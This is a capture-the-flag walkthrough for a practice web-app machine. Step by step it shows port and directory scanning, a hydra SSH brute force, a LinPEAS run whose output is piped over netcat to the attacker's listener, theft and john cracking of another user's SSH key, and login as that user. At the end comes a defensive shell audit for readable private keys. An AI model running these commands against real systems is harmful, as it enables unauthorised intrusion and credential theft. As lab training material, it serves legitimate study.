This is a machine that allows you to practise web app hacking and privilege escalation
| Title | Target IP |
|---|---|
| Web App Test | 1*.**.*.*** |
In this set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
```
nmap -sC -sV -oN nmap 1*.**.*.***

22/tcp    O***SSH
80/tcp    A*****
138/tcp   S****
445/tcp   S****
8009/tcp  A*****
8080/tcp  A*****
```
View Page Source: http://1*.**.*.***
```
<!-- Check our dev note section if you need to know what to work on. -->
```
```
gobuster dir -u http://1*.**.*.***/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -t 100

/d********** (Status: 301) [Size: 316] [--> http://1*.**.*.***/d**********/]
```
View Page Source: http://1*.**.*.***/d**********/
```
href="dev.txt"
href="j.txt"
```
Go to: http://1*.**.*.***/d**********/dev.txt
Go to: http://1*.**.*.***/d**********/j.txt
```
enum4linux 1*.**.*.*** | tee enum4linux

S-1-22-1-1000 Unix User\k** (Local User)
S-1-22-1-1001 Unix User\j** (Local User)
```
```
hydra -l j** -P /usr/share/wordlists/rockyou.txt ssh://1*.**.*.***

[22][ssh] host: 1*.**.*.*** login: j** password: a******
```
Using: LinPEAS
Using: j**:a******
```
scp /opt/linpeas/linpeas.sh j**@1*.**.*.***:/dev/shm
nc -lvnp 9000 | tee linpeas
ssh j**@1*.**.*.***
```
RHOST:
```
cd /dev/shm
chmod 700 linpeas.sh
./linpeas.sh -a -e | nc 1*.**.**.** 9000
```

```
══╣ Possible private SSH keys were found! /home/k**/.ssh/id_rsa
```

```
cat /home/k**/.ssh/id_rsa
```
- Copy
LHOST:
```
cat > k**_id_rsa
```
- Paste, then ctrl+d (2x)
```
ssh2john k**_id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

b****** (k**_id_rsa)

chmod 600 k**_id_rsa
```
Using: k**:b******
```
ssh -i k**_id_rsa k**@1*.**.*.***
```
RHOST:
```
cat pass.bak

h*****************************************************$$
```
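
The LinPEAS finding above, a private SSH key in one user's home directory that a different logged-in account could read, is a file-permission misconfiguration that a host audit can catch. As an added example (not part of the original write-up), this POSIX shell function lists private key files that group or other users can read; the function name `audit_private_keys` and the usage path are assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): report private key files
# under a directory tree that group or other users are able to read.

# audit_private_keys DIR
# Prints "<permission string> <path>" for every regular file that
#   1. has the group-read or other-read bit set, and
#   2. starts with a PEM/OpenSSH private key header on its first line.
# Prints nothing when no such file exists.
audit_private_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) -exec sh -c '
        for f do
            # Matches RSA, DSA, EC, OPENSSH, ENCRYPTED and plain PKCS#8 headers.
            if head -n 1 "$f" 2>/dev/null |
               grep -Eq "^-----BEGIN ([A-Z]+ )?PRIVATE KEY-----"; then
                # First 10 characters of ls -ld are the type and mode bits.
                perms=$(ls -ld "$f" | cut -c1-10)
                printf "%s %s\n" "$perms" "$f"
            fi
        done
    ' sh {} + 2>/dev/null
}

# Run against a directory when one is given on the command line, e.g.
#   sh audit_keys.sh /home      (hypothetical script name)
if [ "$#" -gt 0 ]; then
    audit_private_keys "$1"
fi
```

Any file it reports should be restricted to its owner (`chmod 600`, the mode the walkthrough applies to the copied key before using it). A passphrase alone does not protect a readable key, since the write-up recovers it from a wordlist.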